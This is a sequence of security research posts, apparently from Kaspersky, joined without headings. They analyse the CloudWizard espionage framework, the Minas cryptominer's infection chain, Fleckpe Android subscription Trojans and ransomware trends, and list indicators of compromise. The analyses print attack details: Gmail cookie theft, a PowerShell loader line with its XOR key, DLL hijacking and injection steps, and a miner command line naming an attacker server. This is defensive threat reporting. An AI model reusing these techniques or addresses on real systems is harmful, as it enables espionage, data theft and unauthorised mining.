In response to the heartbeats, the orchestrator receives commands allowing it to perform module management: install, start, stop, delete modules or change their configurations. Each command contains magic bytes (DE AD BE EF) and a JSON string (e.g., {“Delete”: [“Keylogger”, “Screenshot”]}), optionally followed by a module DLL file.

Encryption and communication

As we have mentioned above, two modules (Crypton.dll and Internet.dll) are bundled with every installation of the CloudWizard framework. The Crypton module performs encryption and decryption of all communications. It uses two encryption algorithms:

• Heartbeat messages and commands are encrypted with AES (the key is specified in the JSON configuration VFS file)
• Other data (e.g., module execution results) is encrypted with a combination of AES and RSA. First, the data is encrypted with a generated pseudorandom AES session key, and then the AES key is encrypted with RSA.

if ( buffers->results.lenstr && buffers->results.str ) { v10 = RSA_Encrypt(AES_KEY, 32, &v8, &v7, pubKey, pubKeySize); if (v10) { free(v8); return v10; } v10 = AES_Encrypt(buffers->results.str, buffers->results.lenstr, &v4, &v6, AES_KEY); if (v10) goto LABEL_11; } if (buffers->state.lenstr && buffers->state.str) { v10 = AES_Encrypt(buffers->state.str, buffers->state.lenstr, &v3, &v5, phpKey); if (v10) goto LABEL_11; } The internet connection module relays the encrypted data to the malware operators. It supports four different communication types:

• Cloud storages: OneDrive, Dropbox, Google Drive
• Web-based C2 server

The primary cloud storage is OneDrive, while Dropbox and Google Drive are used if OneDrive becomes inaccessible. The module’s configuration includes OAuth tokens required for cloud storage authentication.

As for the web server endpoint, it is used when the module can’t access any of the three cloud storages. To interact with it, it makes a GET request to the URL specified in its configuration, getting new commands in response. These commands likely include new cloud storage tokens.

While examining the strings of the network module, we found a string containing the directory name from the developer’s machine: D:\Projects\Work_2020\Soft_Version_5\Refactoring.

Module arsenal

Information gathering is performed through auxiliary DLL modules that have the following exported functions:

Export function Description Start Starts the module Stop Stops the module Whoami Returns JSON-object with information about module
(e.g., {“Module”:”Keylogger “,”time_mode”:”2″,”Version”:”0.01″}).
The time_mode value indicates whether the module is persistent (1 – no, 2 – yes). GetResult Returns results of module execution (e.g. collected screenshots, microphone recordings, etc.). Most modules return results in the form of ZIP archives (that are stored in memory) GetSettings Returns module configuration

Modules can persist upon reboot (in this case they are saved in the mods.lrs VFS file) or executed in memory until the machine is shut down or the module is deleted by the operator.

In total, we found nine auxiliary modules performing different malicious activities such as file gathering, keylogging, taking screenshots, recording the microphone and stealing passwords.

The module that looked most interesting to us is the one that performs email exfiltration from Gmail accounts. In order to steal, it reads Gmail cookies from browser databases. Then, it uses the obtained cookies to access the Gmail web interface in legacy mode by making a GET request to  https://mail.google.com/mail/u/<account ID>/?ui=html&zy=h. When legacy mode is accessed for the first time, Gmail prompts the user to confirm whether they really wants to switch to legacy mode, sending the following webpage in response:

If the module receives such a prompt, it simulates a click on the “I’d like to use HTML Gmail” button by making a POST request to a URL from the prompt’s HTML code.

Having obtained access to the legacy web client, the module exfiltrates activity logs, the contact list and all the email messages.
What’s also interesting is that the code for this module was partially borrowed from the leaked Hacking Team source code.

Back to 2017

After obtaining the CloudWizard’s orchestrator and its modules, we were still missing one part of the infection chain: the framework installer. While searching through older telemetry data, we were able to identify multiple installers that were used from 2017 to 2020. The version of the implant installed at that time was 4.0 (as we wrote above, the most recent version we observed is 5.0).

The uncovered installer is built with NSIS. When launched, it drops three files:

• C:\ProgramData\Microsoft\WwanSvc\WinSubSvc.exe
• C:\ProgramData\Microsoft\MF\Depending.GRL (in other versions of the installer, this file is also placed under C:\ProgramData\Microsoft\MF\etwdrv.dll)
• C:\ProgramData\System\Vault\etwupd.dfg

Afterwards, it creates a service called “Windows Subsystem Service” that is configured to run the WinSubSvc.exe binary on every startup.

It is worth noting that the installer displays a message with the text “Well done!” after infection:

This may indicate that the installer we discovered is used to deploy CloudWizard via physical access to target machines, or that the installer attempts to mimic a Network Settings (as displayed in the window title) configurator.

The old (4.0) and new (5.0) CloudWizard versions have major differences, as outlined in the table below:

Version 4.0 Version 5.0 Network communication and cryptography modules are contained within the main module Network communication and cryptography modules are separate from each other Framework source file compilation directory: D:\Projects\Work_2020\Soft_Version_4\Service Framework source file compilation directory:  D:\Projects\Work_2020\Soft_Version_5\Refactoring Uses RC5 (hard-coded key: 7Ni9VnCs976Y5U4j) from the RC5Simple library for C2 server traffic encryption and decryption Uses RSA and AES for C2 server traffic encryption and decryption (the keys are specified in a configuration file) Attribution magic

After spending considerable time researching CloudWizard, we decided to look for clues that would allow us to attribute it to an already known actor. CloudWizard reminded us of two campaigns observed in Ukraine and reported in public: Operation Groundbait and Operation BugDrop. Operation Groundbait was first described by ESET in 2016, with the first implants observed in 2008. While investigating Operation Groundbait, ESET uncovered the Prikormka malware, which is  “the first publicly known Ukrainian malware that is being used in targeted attacks”. According to ESET’s report, the threat actors behind Operation Groundbait “most likely operate from within Ukraine”.

As for Operation BugDrop, it is a campaign discovered by CyberX in 2017. In their report, CyberX claims (without providing strong evidence) that Operation BugDrop has similarities with Operation Groundbait. And indeed, we have discovered evidence confirming this:

• Prikormka USB DOCS_STEALER module (MD5: 7275A6ED8EE314600A9B93038876F853B957B316) contains the PDB path D:\My\Projects_All\2015\wallex\iomus1_gz\Release\iomus.pdb;
• BugDrop USB stealer module (MD5: a2c27e73bc5dec88884e9c165e9372c9) contains the PDB path D:\My\Projects_All\2016\iomus0_gz\Release\usdlg.pdb.

The following facts allow us to conclude with medium to high confidence that the CloudWizard framework is operated by the actor behind Operation Groundbait and Operation BugDrop:

• ESET researchers found the loader of CloudWizard version 4.0 dll (with the export name LCrPsdNew.dll) to be similar to a Prikormka DLL. The similarity between these two files has been noted in the Virus Bulletin 2019 talk ‘Rich headers: leveraging the mysterious artifact of the PE format’ (slide 42)

  Slide 42 of the VB2019 ‘Rich headers: leveraging the mysterious artifact of the PE format’ talk

• ESET detects a loader of a CloudWizard v. 4 sample (MD5: 406494bf3cabbd34ff56dcbeec46f5d6, PDB path: D:\Projects\Work_2017\Service\Interactive Service_system\Release\Service.pdb) as Win32/Prikormka.CQ.
• According to our telemetry data, multiple infections with the Prikormka malware ended with a subsequent infection with the CloudWizard framework
• Implementation of several modules of CloudWizard resembles the corresponding one from the Prikormka and BugDrop modules, though rewritten from C to C++:
  • USB stealer modules retrieve the serial numbers and product IDs of connected USB devices via the IOCTL_STORAGE_QUERY_PROPERTY system call. The default fallback value in case of failure is the same, “undef”.

    Retrieval of USB device serial number and product ID in BugDrop (MD5: F8BDE730EA3843441A657A103E90985E)

    Retrieval of USB device serial number and product ID in CloudWizard (MD5: 39B01A6A025F672085835BD699762AEC)

    Assignment of the ‘undef’ string in BugDrop (left) and CloudWizard (right) in the samples above

  • The modules for taking screenshots use the same list of window names that trigger an increase in the frequency of screenshot taking: ‘Skype’ and ‘Viber’. CloudWizard and Prikormka share the same default value for the screenshot taking interval (15 minutes).

    Comparison of the window title text in Prikormka (MD5: 16793D6C3F2D56708E5FC68C883805B5)

    Addition of the ‘SKYPE’ and ‘VIBER’ string to a set of window titles in CloudWizard (MD5: 26E55D10020FBC75D80589C081782EA2)

  • The file listing modules in both Prikormka and CloudWizard samples have the same name: Tree. They also use the same format string for directory listings: “\t\t\t\t\t(%2.2u,%2.2u.%2.2u.%2.2u)\n”.

    Use of the same format string for directory listings in Prikormka (above, MD5: EB56F9F7692F933BEE9660DFDFABAE3A) and CloudWizard (below, MD5: BFF64B896B5253B5870FE61221D9934D)

  • Microphone modules record sound in the same way: first making a WAV recording using Windows Multimedia API and then converting it to MP3 using the LAME library. While this pattern is common in malware, the strings used to specify settings for the LAME library are specific: 8000 Hz and 16 Kbps. Both Prikormka and CloudWizard modules extract integers from these strings, using them in the LAME library.
  • A similar order of extensions is used in extension lists found in Prikormka and CloudWizard modules:
    

    Extension lists in Prikormka (left, MD5: EB56F9F7692F933BEE9660DFDFABAE3A) and CloudWizard (right, MD5: BFF64B896B5253B5870FE61221D9934D)

• In Prikormka, the names of files to be uploaded to the C2 server have the name format mm.yy_hh.mm.ss.<extension>. In CloudWizard, the files have the name format dd.mm.yyyy_hh.mm.ss.ms.dat. The date substituted into the name format strings is retrieved from the GetLocalTime API function.
• The C2 servers of both Prikormka and CloudWizard are hosted by Ukrainian hosting services. Additionally, there are similarities between BugDrop and CloudWizard in terms of exfiltrating files to the Dropbox cloud storage.
• Victims of Prikormka, BugDrop and CloudWizard are located in western and central Ukraine, as well as the area of conflict in Eastern Europe.

As for the similarities between CloudWizard and CommonMagic, they are as follows:

• The code that performs communication with OneDrive is identical in both frameworks. We did not find this code to be part of any open-source library. This code uses the same user agent: “Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136”.

The same strings in the internet communication module of CloudWizard (left, MD5: 84BDB1DC4B037F9A46C001764C115A32) and CommonMagic (right, MD5: 7C0E5627FD25C40374BC22035D3FADD8)

• Both frameworks, CloudWizard (version 4) and CommonMagic use the RC5Simple library for encryption. Files encrypted with RC5Simple start with a 7-byte header, which is set to ‘RC5SIMP’ in the library source code. However, this value has been changed in the malicious implants: DUREX43 in CloudWizard and Hwo7X8p in CommonMagic. Additionally, CloudWizard and CommonMagic use the RapidJSON library for parsing JSON objects.
• Names of files uploaded to the C2 server in CommonMagic have the format mm.dd _hh.mm.ss.ms.dat (in CloudWizard, the name format is dd.mm.yyyy_hh.mm.ss.ms.dat).
• Victim IDs extracted from CloudWizard and CommonMagic samples are similar: they contain a date followed by the two same letters, e.g. 03072020DD, 05082020BB in CloudWizard and WorkObj20220729FF in CommonMagic.
• Victims of CommonMagic and CloudWizard are located in the area of conflict in Eastern Europe.

So what?

We initiated our investigation back in 2022, starting with simple malicious PowerShell scripts deployed by an unknown actor and ended up discovering and attributing two large related modular frameworks: CommonMagic and CloudWizard. As our research demonstrates, their origins date back to 2008, the year the first Prikormka samples were discovered. Since 2017, there have been no traces of Groundbait and BugDrop operations. However, the actor behind these two operations has not ceased their activity, and has continued developing their cyberespionage toolset and infecting targets of interest for more than 15 years.

Indicators of compromise

NSIS installer

MD5 0edd23bbea61467f144d14df2a5a043e
SHA256 177f1216b55058e30a3ce319dc1c7a9b1e1579ea3d009ba965b18f795c1071a4

Loader (syncobjsup.dll)

MD5 a2050f83ba2aa1c4c95567a5ee155dca
SHA256 041e4dcdc0c7eea5740a65c3a15b51ed0e1f0ebd6ba820e2c4cd8fa34fb891a2

Orchestrator (Main.dll)

MD5 0ca329fe3d99acfaf209cea559994608
SHA256 11012717a77fe491d91174969486fbaa3d3e2ec7c8d543f9572809b5cf0f2119

Domains and IPs

91.228.147[.]23
curveroad[.]com

Sometimes when investigating an infection and focusing on a targeted attack, we come across something we were not expecting. The case described below is one such occurrence.

In June 2022, we found a suspicious shellcode running in the memory of a system process. We decided to dig deeper and investigate how the shellcode was initially placed into the process and where on the infected system the threat was hidden.

The infection chain

We were unable to reproduce the whole infection procedure, but we were able to reconstruct it from the point at which PowerShell was executed, as shown in the sceme below.

General attack execution flow

In a nutshell, the infection chain is as follows:

1. PowerShell script runs via the Task Scheduler and downloads the lgntoerr.gif file from a remote server.
2. The script decrypts lgntoerr.gif, resulting in a .NET DLL, which is then loaded.
3. The .NET DLL extracts and decrypts three files from its resources: two DLLs and an encrypted payload. The extracted files are placed in the ProgramData directory.
4. The .NET DLL creates a task to autorun the legitimate ilasm.exe component at system startup via Task Scheduler.
5. Task Scheduler starts ilasm.exe from the ProgramData directory.
6. ilasm.exe launches fusion.dll, a malicious DLL hijacker, from the same directory.
7. fusion.dll loads the second decrypted DLL.
8. That DLL creates a suspended dllhost.exe process.
9. It then decrypts the payload from the encrypted binary file.
10. The decrypted payload is loaded into the dllhost.exe process as a DLL.
11. The PID of the dllhost.exe process is saved to a file in the ProgramData directory.
12. The dllhost.exe process passes control to the decrypted payload.
13. The payload DLL extracts and launches the miner DLL in memory.

We named this malware Minas. From our reconstruction of the infection chain, we determined that it originated by running an encoded PowerShell script as a task, which we believe with low confidence was created through GPO:

Encoded PowerShell command

Technical description

The core functionality of the PowerShell script is to launch the malware installation process. To do this, the PowerShell script downloads an encrypted payload from a remote server, decrypts it using a custom XOR encryption algorithm with the key “fuckkasd9akey” and loads the  payload into memory:

Decoded PowerShell command

The payload is a .NET binary (DLL) that is launched by the PowerShell process, passing three arguments:

$a.GetType(“I.C”).GetMethod(“I”).Invoke($null, ([Byte[]]($d),”A5D9FD13″,0));

1. $d: .NET DLL as an array of bytes;
2. A5D9FD13: (key for decrypting resources in the .NET DLL);
3. 0: (parameter used to block the creation of more than one main payload process).

This .NET binary (which we will refer to as “the installer”) is responsible for the subsequent installation of the malware components contained in the resources of .NET DLL.

Using hash functions (Ap, SDBM, RS), the installer creates a directory structure:

C:\ProgramData\{ApHash(MachineName)}\{ApHash(MachineName)}\ilasm.exe C:\ProgramData\{ApHash(MachineName)}\{ApHash(MachineName)}\fusion.dll C:\ProgramData\{ApHash(MachineName)}\{RSHash(MachineName)}\{RSHash(MachineName)} C:\ProgramData\{SDBMHash(MachineName)}\{SDBMHash(MachineName)}.dll

Example files and directories

Next, it checks for the presence of the legitimate ilasm.exe file (version 4.0.30319 located at %windir%\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe or version 2.0.50727 located at %windir%\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe) on the system (note that if ilasm.exe is present on the system, it should be in one of these directories). If the file is not found, the installation process will be terminated. As soon as ilasm.exe is found, a Scheduled Task is created as a persistence mechanism:

• Task path – C:\Windows\System32\Tasks\Windows\Microsoft\{RSHash(ApHash(Hostname))}\{ApHash(RSHash(Hostname))} • File name - C:\ProgramData\{ApHash(MachineName)}\{ApHash(MachineName)}\ilasm.exe • Delay - 120 seconds

After this, the files are copied to the previously created directories as mentioned above (see directory structure).

The malware then proceeds to append the first 100 bytes of the installer to the file {RSHash(MachineName)} that was extracted from the “_64_bin” .NET DLL resource, and the resulting file is encrypted (the key is the machine name in lower case). In addition, up to 10240 of random bytes are appended to the fusion.dll and {SDBMHash(MachineName)}.dll files, thus rendering hash detection by anti-malware products ineffective.

After that, the installer starts the previously created task for the running ilasm.exe, which in turn loads the malicious fusion.dll library located in the same directory, under the assumption it is using the legitimate fusion.dll (DLL hijacking technique).

The malware execution process consists of two loaders: DLL hijacker fusion.dll and the next stage loader {SDBMHash(MachineName)}.dll.

The DLL hijacker does three things:

1. Hides the console of the ilasm.exe process.
2. Determines whether the name of the process is ilasm.exe. If not, it terminates the process.
3. Based on the SDBM hash function, it builds the path C:\ProgramData\{SDBMHash(MachineName)}\{SDBMHash(MachineName)}.dll and tries to load that DLL into memory via the LoadLibraryA API function.

The loaded {SDBMHash(MachineName)}.dll DLL again checks whether the name of the process is ilasm.exe.

It then generates the file path C:\ProgramData\{SDBMHash({SDBMHash(MachineName)})} and checks if it exists. If the file exists, it reads the value (decimal number) from it. This decimal number is the PID of the dllhost.exe process multiplied by 0x1F4 created by a previous run of Minas. The loader then tries to terminate the process with that PID.

It then reads and decrypts (recall that the key is the machine name in lower case) the main payload (the miner) located at C:\ProgramData\{ApHash(MachineName)}\{RSHash(MachineName)}\{RSHash(MachineName)}. In addition, the loader creates a process environment variable (SetEnvironmentVariable) configuration with values ​​{“addr”:”185.243.112.239:443″,”p”:”143e256609bcb0be5b9f9c8f79bdf8c9″} (see the configuration description below for more details).

Passing parameters through the process

After that, {SDBMHash(MachineName)}.dll creates a suspended dllhost.exe process, creates a section, maps it into the dllhost.exe process and writes the previously read and decrypted file (raw loader with the miner component). It then reads the memory of the dllhost.exe process, determines the entry point of the main thread and rewrites it to:

sub rsp, 48 call (section with the body of a previously written data) nop

The PID of the created dllhost.exe process multiplied by 0x1F4 is then written to C:\ProgramData\{SDBMHash({SDBMHash(MachineName)})}, after which the dllhost.exe process resumes. It then terminates the ilasm.exe process.

Last but not least, dllhost.exe passes control flow to the decrypted raw loader that maps the XMRig miner (assembly of the XMRig miner in the form of a DLL file) in the process memory, and then launches it using reflective loading.

The miner gets the values ​​of the process environment variable configuration using (GetEnvironmentVariable). These values ​​are used for mining cryptocurrency with the following configuration:

"-o 185.243.112.239:443" (IP address obtained from environment variable configuration, addr value) — acts as the address of the mining server. "--tls" Enables SSL/TLS support (requires pooling support). "--tls-fingerprint 14E18CC1BD2F1AF7344B31692CAEDA949A62F71475F43AE4D9EA287E9847B495" Pool TLS certificate thumbprint for certificate hard pinning. "cpu-max-threads-hint 64" Maximum number of threads. "-B" Runs the miner in the background. "--rig-id 143e256609bcb0be5b9f9c8f79bdf8c9" (rig ID obtained from configuration environment variable, p value) — Rig ID for pool statistics (requires pool support).

Conclusion

Minas is a miner that uses a standard implementation and aims to hide its presence. The difficulty of detection is achieved due to encryption, the random generation of names and the use of hijacking and injection techniques. It also has the ability to stay on the infected system using persistence techniques.

Although we were unable to determine with complete certainty how the initial PowerShell command was executed, our indicators pointed to execution via GPO. This is particularly worrisome because it means the attackers have compromised the network, indicating that they are going to great lengths to install their miners.

Also, it is very likely that a new variant will be released in the future that avoids AV detection. As a rule of thumb, use an AV that doesn’t primarily rely on signature detection, but also looks at (processes) behavior.

Minas indicators of compromise

MD5 hashes
08da41489b4b68565dc77bb9acb1ecb4
06fe9ab0b17f659486e3c3ace43f0e3a
f38a1b6b132afa55ab48b4b7a8986181
63e0cd6475214c697c5fc115d40327b4

More indicators of compromise and YARA rules for detecting Minas malware are available for TIP subscribers. Contact intelreports@kaspersky.com for more details.

Kaspersky offers various services to organizations that have been targeted by cyberattackers, such as incident response, digital forensics, and malware analysis. In our annual incident response report, we share information about the attacks that we investigated during the reporting period. Data provided in this report comes from our daily interactions with organizations seeking assistance with full-blown incident response or complementary expert services for their internal incident response teams.

Download the full version of the report (PDF)

Kaspersky Incident Response in various regions and industries

In 2022, 45.9% of organizations that encountered cyberincidents were in Russia and the CIS region, followed by the Middle East (22.5%), the Americas (14.3%), and Europe (13.3%).

From an industry perspective, we offered help to government (19.39%), financial (18.37%), and industrial (17.35%) organizations most frequently.

Key trends in 2022: initial attack vectors and impact

In 2022, attackers most often penetrated organizations’ infrastructure by exploiting various vulnerabilities in public-facing applications (42.9%). However, compared to 2021, the share of this initial attack vector decreased by 10.7 pp, while the share of attacks involving compromised accounts (23.8%) grew. Malicious e-mail sharing among the initial attack vectors continued to go down and comprised 11.9% in 2022.

In 39.8% cases the reported incidents were related to ransomware attacks. Encrypted data remains the number-one problem that our customers are faced with. However, compared to 2021, the number of ransomware-related incidents dropped, and not every attack involving file encryption was aimed at extracting a ransom. In some of these incidents, ransomware was used to hide the initial traces of the attack and complicate the investigation.

Expert recommendations

To protect your organization against cyberattacks, Kaspersky experts recommend the following:

• Implement a robust password policy and enforce multifactor authentication
• Remove management ports from public access
• Establish a zero-tolerance policy for patch management or compensation measures for public-facing applications
• Make sure that your employees maintain a high level of security awareness
• Use a security toolstack with EDR-like telemetry
• Implement rules for detection of pervasive tools used by adversaries
• Continuously train your incident response and security operations teams to maintain their expertise and stay up to speed with the changing threat landscape
• Back up your data on a regular basis
• Work with an Incident Response Retainer partner to address incidents with fast SLAs

To learn more about incident response in 2022, including a MITRE ATT&CK tactics and techniques heatmap, and distribution of various incidents by region and industry, download the full version of the report (PDF).

For a deeper analysis of the vulnerabilities most commonly exploited by cyberattackers, download this appendix (PDF).

Ransomware keeps making headlines. In a quest for profits, attackers target all types of organizations, from healthcare and educational institutions to service providers and industrial enterprises, affecting almost every aspect of our lives. In 2022, Kaspersky solutions detected over 74.2M attempted ransomware attacks which was 20% more than in 2021 (61.7M). Although early 2023 saw a slight decline in the number of ransomware attacks, they were more sophisticated and better targeted.

On the eve of the global Anti-Ransomware Day, Kaspersky looks back on the events that shaped the ransomware landscape in 2022, reviews the trends that were predicted last year, discusses emerging trends, and makes a forecast for the immediate future.

Looking back on last year’s report

Last year, we discussed three trends in detail:

• Threat actors trying to develop cross-platform ransomware to be as adaptive as possible
• The ransomware ecosystem evolving and becoming even more “industrialized”
• Ransomware gangs taking sides in the geopolitical conflict

These trends have persisted. A few months after last year’s blog post came out, we stumbled across a new multi-platform ransomware family, which targeted both Linux and Windows. We named it RedAlert/N13V. The ransomware, which focused on non-Windows platforms, supported the halting of VMs in an ESXi environment, clearly indicating what the attackers were after.

Another ransomware family, LockBit, has apparently gone even further. Security researchers discovered an archive that contained test builds of the malware for a number of less common platforms, including macOS and FreeBSD, as well as for various non-standard processor architectures, such as MIPS and SPARC.

As for the second trend, we saw that BlackCat adjusted their TTPs midway through the year. They registered domains under names that looked like those of breached organizations, setting up Have I Been Pwned-like websites. Employees of the victim organizations could use these sites to check if their names had popped up in stolen data, thus increasing the pressure on the affected organization to pay the ransom.

Although the third trend we spotted last year was one of ransomware gangs taking sides in the geopolitical conflict, it does not apply to them exclusively. There was one peculiar sample: a stealer called Eternity. We created a private report about this after an article claimed that the malware was used in the geopolitical conflict. Our research showed that there was a whole malware ecosystem around Eternity, including a ransomware variant. After the article appeared, the author made sure that the malware did not affect users in Ukraine and included a pro-Ukrainian message inside the malware.

The developer warns against using their malware in Ukraine

Pro-Ukrainian message inside the malware code

What else shaped the ransomware landscape in 2022

Ransomware groups come and go, and it is little wonder that some of them ceased operations last year as others emerged.

For example, we reported on the emergence of RedAlert/N13V, Luna, Sugar, Monster, and others. However, the most active family that saw light in 2022 was BlackBasta. When we published our initial report on BlackBasta in April 2022, we were only aware of one victim, but the number has since sharply increased. Meanwhile, the malware itself evolved, adding an LDAP-based self-spreading mechanism. Later, we encountered a version of BlackBasta that targeted ESXi environments, and the most recent version that we found supported the x64 architecture.

As mentioned above, while all those new groups entered the game, some others, such as REvil and Conti, went dark. Conti was the most notorious of these and enjoyed the most attention since their archives were leaked online and analyzed by many security researchers.

Finally, other groups like Clop ramped up their activities over the course of last year, reaching their peak in early 2023 as they claimed to have hacked 130 organizations using a single zero-day vulnerability.

Interestingly, the top five most impactful and prolific ransomware groups (according to the number of victims listed on their data leak sites) have drastically changed over the last year. The now-defunct REvil and Conti, which were second and third, respectively, in terms of attacks in H1 2022, gave way to Vice Society and BlackCat in Q1 2023. The remaining ransomware groups that formed the top five in Q1 2023, were Clop and Royal.

Top five ransomware groups by the number of published victims

H1 2022 H2 2022 Q1 2023 LockBit 384 LockBit 368 LockBit 272 REvil 253 BlackBasta 176 Vice Society 164 Conti 173 BlackCat 113 BlackCat 85 BlackCat 100 Royal 74 Clop 84 Vice Society 54 BianLian 72 Royal 65 Other 384 Other 539 Other 212 Ransomware from an incident response perspective

Global Emergency Response Team (GERT) worked on many ransomware incidents last year. In fact, this was the number-one challenge they faced, although the share of ransomware in 2022 decreased slightly from 2021, going from 51.9% to 39.8%.

In terms of initial access, nearly half of the cases GERT investigated (42.9%) involved exploitation of vulnerabilities in public-facing devices and apps, such as unpatched routers, vulnerable versions of the Log4j logging utility, and so on. The second-largest category of cases consisted of compromised accounts and malicious emails.

The most popular tools employed by ransomware groups remain unchanged from year to year. Attackers have used PowerShell to collect data, Mimikatz to escalate privileges, PsExec to execute commands remotely, or frameworks like Cobalt Strike for all attack stages.

Our predictions for 2023 trends

As we looked back on the events of 2022 and early 2023, and analyzed the various ransomware families, we tried to figure out what the next big thing in this field might be. These observations produced three potential trends that we believe will shape the threat landscape for the rest of 2023.

Trend 1: More embedded functionality

We saw several ransomware groups extend the functionality of their malware during 2022. Self-spreading, real or fake, was the most noteworthy new addition. As mentioned above, BlackBasta started spreading itself by using the LDAP library to get a list of available machines on the network.

LockBit added a so-called “self-spreading” feature in 2022, saving its operators the effort needed to run tools like PsExec manually. At least, that is what “self-spreading” would normally suggest. In practice, this turned out to be nothing more than a credential-dumping feature, removed in later versions.

The Play ransomware, for one, does have a self-spreading mechanism. It collects different IPs that have SMB enabled, establishes a connection to these, mounts the SMB resources, then copies itself and runs on the target machines.

Self-propagation has been adopted by many notorious ransomware groups lately, which suggests that the trend will continue.

Trend 2: Driver abuse

Abusing a vulnerable driver for malicious purposes may be an old trick in the book, but it still works well, especially on antivirus (AV) drivers. The Avast Anti Rootkit kernel driver contained certain vulnerabilities that were previously exploited by AvosLocker. In May 2022, SentinelLabs described in detail two new vulnerabilities (CVE-2022-26522 and CVE-2022-26523) in the driver. These were later exploited by the AvosLocker and Cuba ransomware families.

AV drivers are not the only ones to be abused by malicious actors. Our colleagues at TrendMicro reported on a ransomware actor abusing the Genshin Impact anti-cheat driver by using it to kill endpoint protection on the target machine.

The trend of driver abuse continues to evolve. The latest case reported by Kaspersky is rather odd as it does not fit either of the previous two categories. Legitimate code-signing certificates, such as Nvidia’s leaked certificate and Kuwait Telecommunication Company’s certificate were used to sign a malicious driver which was then used in wiper attacks against Albanian organizations. The wiper used the rawdisk driver to get direct access to the hard drive.

We continue to follow ransomware gangs to see what new ways of abusing drivers they come up with, and we will be sharing our findings both publicly and on our TIP page.

Trend 3: Code adoption from other families to attract even more affiliates

Major ransomware gangs are borrowing capabilities from either leaked code or code purchased from other cybercriminals, which may improve the functionality of their own malware.

We recently saw the LockBit group adopt at least 25% of the leaked Conti code and issue a new version based entirely on that. Initiatives like these enable affiliates to work with familiar code, while the malware operators get an opportunity to boost their offensive capabilities.

Collaboration among ransomware gangs has also resulted in more advanced attacks. Groups are working together to develop cutting-edge strategies for circumventing security measures and improving their attacks.

The trend has given rise to ransomware businesses that build high-quality hack tools and sell them to other ransomware businesses on the black market.

Conclusion

Ransomware has been around for many years, evolving into a cybercriminal industry of sorts. Threat actors have experimented with new attack tactics and procedures, and their most effective approaches live on, while failed experiments have been forgotten. Ransomware can now be considered a mature industry, and we expect no groundbreaking discoveries or game-changers any time soon.

Ransomware groups will continue maximizing the attack surface by supporting more platforms. While attacks on ESXi and Linux servers are now commonplace, top ransomware groups are striving to target more platforms that might contain mission-critical data. A good illustration of this trend is the recent discovery of an archive with test builds of LockBit ransomware for macOS, FreeBSD, and unconventional CPU architectures, such as MIPS, SPARC, and so on.

In addition to that, TTPs that attackers use in their operations will continue to evolve — the driver abuse technique, which we discussed above, is a good example of this. To effectively counter ransomware actors’ ever-changing tactics, we recommend that organizations and security specialists:

• Update their software in a timely manner to prevent infection through vulnerability exploitation, one of the initial infection vectors most frequently used by ransomware actors.
• Use security solutions that are tailored protecting their infrastructure from various threats, including anti-ransomware tools, targeted attack protection, EDR, and so on.
• Keep their SOC or information security teams’ knowledge about ransomware tactics and techniques up to date by using the Threat Intelligence service, a comprehensive source of crucial information about new tricks that cybercriminals come up with.

Every once in a while, someone will come across malicious apps on Google Play that seem harmless at first. Some of the trickiest of these are subscription Trojans, which often go unnoticed until the user finds they have been charged for services they never intended to buy. This kind of malware often finds its way into the official marketplace for Android apps. The Jocker family and the recently discovered Harly family are just two examples of this. Our latest discovery, which we call “Fleckpe”, also spreads via Google Play as part of photo editing apps, smartphone wallpaper packs and so on.

Fleckpe technical description

Our data suggests that the Trojan has been active since 2022. We have found eleven Fleckpe-infected apps on Google Play, which have been installed on more than 620,000 devices. All of the apps had been removed from the marketplace by the time our report was published but the malicious actors might have deployed other, as yet undiscovered, apps, so the real number of installations could be higher.

And here is a description of Fleckpe’s modus operandi. When the app starts, it loads a heavily obfuscated native library containing a malicious dropper that decrypts and runs a payload from the app assets.

Malicious library loading

The payload contacts the threat actors’ C&C server, sending information about the infected device, such as the MCC (Mobile Country Code) and MNC (Mobile Network Code), which can be used to identify the victim’s country and carrier. The C&C server returns a paid subscription page. The Trojan opens the page in an invisible web browser and attempts to subscribe on the user’s behalf. If this requires a confirmation code, the malware gets it from notifications (access to which was asked at the first run).

Intercepting notifications

Having found the code, the Trojan enters it in the appropriate field and completes the subscription process. The victim proceeds to use the app’s legitimate functionality, for example, installs wallpapers or edits photos, unaware of the fact that they are being subscribed to a paid service.

Entering the confirmation code

The Trojan keeps evolving. In recent versions, its creators upgraded the native library by moving most of the subscription code there. The payload now only intercepts notifications and views web pages, acting as a bridge between the native code and the Android components required for purchasing a subscription. This was done to significantly complicate analysis and make the malware difficult to detect with the security tools. Unlike the native library, the payload has next to no evasion capabilities, although the malicious actors did add some code obfuscation to the latest version.

Core logic inside the native method

Victims

We found that the Trojan contained hard-coded Thai MCC and MNC values, apparently used for testing. Thai-speaking users notably dominated the reviews for the infected apps on Google Play. This led us to believe that this particular malware targeted users from Thailand, although our telemetry showed that there had been victims in Poland, Malaysia, Indonesia and Singapore.

The Thai test MCC and MNC values

Kaspersky security products detect the malicious app as Trojan.AndroidOS.Fleckpe.

Conclusion

Sadly, subscription Trojans have only gained popularity with scammers lately. Their operators have increasingly turned to official marketplaces like Google Play to spread their malware. Growing complexity of the Trojans has allowed them to successfully bypass many anti-malware checks implemented by the marketplaces, remaining undetected for long periods of time. Affected users often fail to discover the unwanted subscriptions right away, let alone find out how they happened in the first place. All this makes subscription Trojans a reliable source of illegal income in the eyes of cybercriminals.

To avoid malware infection and subsequent financial loss, we recommend to be cautious with apps, even those coming from Google Play, avoid giving permissions they should not have, and install an antivirus product capable of detecting this type of Trojans.

IOCs

Package names
com.impressionism.prozs.app
com.picture.pictureframe
com.beauty.slimming.pro
com.beauty.camera.plus.photoeditor
com.microclip.vodeoeditor
com.gif.camera.editor
com.apps.camera.photos
com.toolbox.photoeditor
com.hd.h4ks.wallpaper
com.draw.graffiti
com.urox.opixe.nightcamreapro

MD5
F671A685FC47B83488871AE41A52BF4C
5CE7D0A72B1BD805C79C5FE3A48E66C2
D39B472B0974DF19E5EFBDA4C629E4D5
175C59C0F9FAB032DDE32C7D5BEEDE11
101500CD421566690744558AF3F0B8CC
7F391B24D83CEE69672618105F8167E1
F3ECF39BB0296AC37C7F35EE4C6EDDBC
E92FF47D733E2E964106EDC06F6B758A
B66D77370F522C6D640C54DA2D11735E
3D0A18503C4EF830E2D3FBE43ECBE811
1879C233599E7F2634EF8D5041001D40
C5DD2EA5B1A292129D4ECFBEB09343C4
DD16BD0CB8F30B2F6DAAC91AF4D350BE
